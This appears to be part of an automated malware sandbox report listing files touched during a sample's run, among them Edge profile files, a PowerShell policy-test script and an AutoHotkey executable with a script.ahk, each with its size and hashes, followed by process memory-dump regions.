2b4df15664a3d1981f7ba7b15fbd5b0ee82e2d2c1cd915496c9522f4df17c3e29b2ff4e7a2f965905a4d6e6f690c90517c4340e5037f8ab754b7ef6bd7e29364

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
68d330eee46d9527cb71c7fd2eabef55

SHA1
d417975354623fa76e2808e794e35b31a3e7df31

SHA256
e0d387469dfcac324fd5c8466516bda19ec365a51aa7bc4bc23347109882f05a

SHA512
dbdad9d54d2716821221360ea4fa879ed43484ddc5b3ebeec4cd8b1bc2b39372bf1c4cb283b901a89d70406d690ba70ba205c9fcb39fcec09f5cdec3ec0faa2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
973326ba24a8de2f82b1a253945f5dd7

SHA1
6be443026d1ad0099061921e44cef6305f1ea036

SHA256
6a3e9d24582c644ac10448d64e99768d9084743eb1fbc6b269265bc4fc4f6f93

SHA512
9df54886c910b5fdb5ed44be877abd4564e65c5dc45720a449633b200baea98f62153e5809680f256f4737fa0ddf8ecf8a338c4e4823c6b565833c4634001f6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
30KB

MD5
bfd2ee7e8144d2cbab05cedb2c0ac981

SHA1
d7518bf2af0d9869df67a2c218d6e4a97358b94c

SHA256
3c8be68b3cd385db90a5956f46bfb033d2123af7a959bc4c4bcc0aeaf4669c82

SHA512
cad0dad819fec6684fd4ec3663b560d41a34957b14c74d451d4aa579bfbd1480b8c2bf815b3eeecb008cda7c8973f223aeb692a5747ada8d2673f63c9e2cd5e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
69KB

MD5
c1ed1c8485f9d6c7721a2dfb3d3c91f8

SHA1
edaf37a9fde40ef2fe0e6e31eac229519e6706e3

SHA256
4978da0555cd740757209d717a1a936d0e8bdd29e15899c163081fbbf74a9c8e

SHA512
40e317d8a9580d4c4f51b7bb01cb4313408b80b39cc2dc5b81133f9bc51ff1e447aa408423ad4b4d585c5d6078938b3efba6a39c945d3cdd28992fac07e538a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
69KB

MD5
25a4423c010e4e9942603d084fa84a5f

SHA1
c56018ea7e8ebf7fa26a107a70a916c9e53c9f22

SHA256
e935f50fa4a189993e8b5db560a1935c198434e93b7fcb6bc3069e14bf0ec219

SHA512
c2f54ca2c3afad8864e2f8240f3555b41fa62fd2e13c37f1cc0f3f6c8e9299ba8104e0f854b1e130e2a9791c49654f3ca6873e18c99c180fa369a3e1ddb2e997

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5bbc10e900220b21eca34369be6931d2

SHA1
482cb0715c18f1533cb4df290075dd7e616a62ac

SHA256
a70c87d4eecbf8d075da0fceb3e221c787fb94b3ae75f94286c486d7bdfa7aea

SHA512
dab631ec178a1d721c93bbc8cf257319e4a84c995f5cad77487a7d7c28cdae98180b21b2a6914588997e1ad33d2b9030f29e72e6ea841900769f48fe0307edb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgwyutyv.osh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b00c4bed-50a4-4b38-a9cf-8fdf773c8784.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Roaming\FDFbfDf

Filesize
32B

MD5
b65e718a487752115dc076a1ef741010

SHA1
a30a7657804520b4d088a07aa24435462ad50cbd

SHA256
0ef39b105282113d605dd0759702cd11fc8e97328773be3397b2b80fb3f5a3d6

SHA512
118958585a12181426ce2db7333624fa9936f645b51566a9bcfe6e55c85aab54b82061a6c1d8a5ec4c548644228c88987329725c58980c549b053581b9b67b5d

Download Submit
C:\rjtu\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\rjtu\script.ahk

Filesize
55KB

MD5
e93f832ee64b07207c38479dbf3ee767

SHA1
7f4a0063a53ed2ba9c2c2e77eacea34ccfbb99f7

SHA256
dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455

SHA512
f46fafc946b0155ab43df99e92f5050e8967ac9528a465afc027801b20431d1c5c8f44a10c04738a995b8819f173e6cf270ab70ed352f69794cef9176f52fe51

Download Submit
C:\rjtu\test.txt

Filesize
163KB

MD5
96036f9ecb526a8d72a37c01fa03309c

SHA1
a4202ca00c0b22426e02c83b5f4a22ed391cee79

SHA256
b401a085b37ae5b308f5451e8e6a783fb0642834fc1ab926e1b11e3e9aef9bfb

SHA512
629666f5a47cc7c6751d36cb5eefab296a538312842d0a78c4214634c41ee227ad41fa0c751b506320ba688134ce143bcf8f4bb44b160eb708151223964aea7e

Download Submit
C:\rjtu\test.txt

Filesize
917KB

MD5
57e19b367883bff9e4f0d905c7634827

SHA1
44afaac68c4792effefcaa63c65c55ef5d089a59

SHA256
4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795

SHA512
dba68357c5d3427171a023919f29d8fc60905708f55acbadb24d5f4b23c355b38994dc6b8c377d6578950e499b205eeb5c9b5ae25885223c2f499e1380fc6c84

Download Submit
memory/1832-50-0x000001EFA5890000-0x000001EFA58A0000-memory.dmp

Filesize
64KB

Download
memory/1832-71-0x00007FFEA9490000-0x00007FFEA9F51000-memory.dmp

Filesize
10.8MB

Download
memory/1832-48-0x00007FFEA9490000-0x00007FFEA9F51000-memory.dmp

Filesize
10.8MB

Download
memory/1868-35-0x0000000004B60000-0x0000000004BD3000-memory.dmp

Filesize
460KB

Download
memory/1868-37-0x0000000004B60000-0x0000000004BD3000-memory.dmp

Filesize
460KB

Download
memory/3688-14-0x000001C2644B0000-0x000001C264672000-memory.dmp

Filesize
1.8MB

Download
memory/3688-32-0x00007FFEA9490000-0x00007FFEA9F51000-memory.dmp

Filesize
10.8MB

Download
memory/3688-13-0x000001C263C20000-0x000001C263C30000-memory.dmp

Filesize
64KB

Download
memory/3688-12-0x000001C263C20000-0x000001C263C30000-memory.dmp

Filesize
64KB

Download
memory/3688-11-0x000001C263C20000-0x000001C263C30000-memory.dmp

Filesize
64KB

Download
memory/3688-10-0x00007FFEA9490000-0x00007FFEA9F51000-memory.dmp

Filesize
10.8MB

Download
memory/3688-0-0x000001C263DD0000-0x000001C263DF2000-memory.dmp

Filesize
136KB

Download
memory/4180-75-0x0000000004680000-0x00000000046F3000-memory.dmp

Filesize
460KB

Download
memory/4180-72-0x0000000004680000-0x00000000046F3000-memory.dmp

Filesize
460KB

Download